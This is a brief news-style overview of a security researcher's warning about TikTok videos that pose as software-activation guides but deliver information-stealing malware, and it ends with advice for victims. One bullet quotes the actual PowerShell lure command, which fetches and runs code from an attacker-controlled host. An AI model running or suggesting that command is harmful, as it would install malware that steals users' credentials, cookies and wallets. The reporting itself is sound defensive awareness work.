Overview
- Security researcher Xavier Mertens of the SANS Internet Storm Center flagged viral TikTok videos that pose as guides to unlock paid software but instead deploy information-stealing malware.
- Creators instruct viewers to copy and run PowerShell one‑liners such as iex (irm slmgr.win/photoshop), which pull and execute code from attacker‑controlled servers.
- Identified payloads include Aura Stealer, with reports also citing families like Vidar and StealC, capable of extracting credentials, session cookies, and cryptocurrency wallet access while potentially granting system control.
- Reports note AI‑styled narration and polished production that heighten credibility, with the short‑form format helping the scams rack up thousands of views and reach younger users.
- Experts advise never executing unknown commands, and if exposed to immediately change all passwords, run a full antivirus scan, enable two‑factor authentication, disconnect from sensitive networks if needed, and report the videos to TikTok; no platform‑wide takedown has been reported.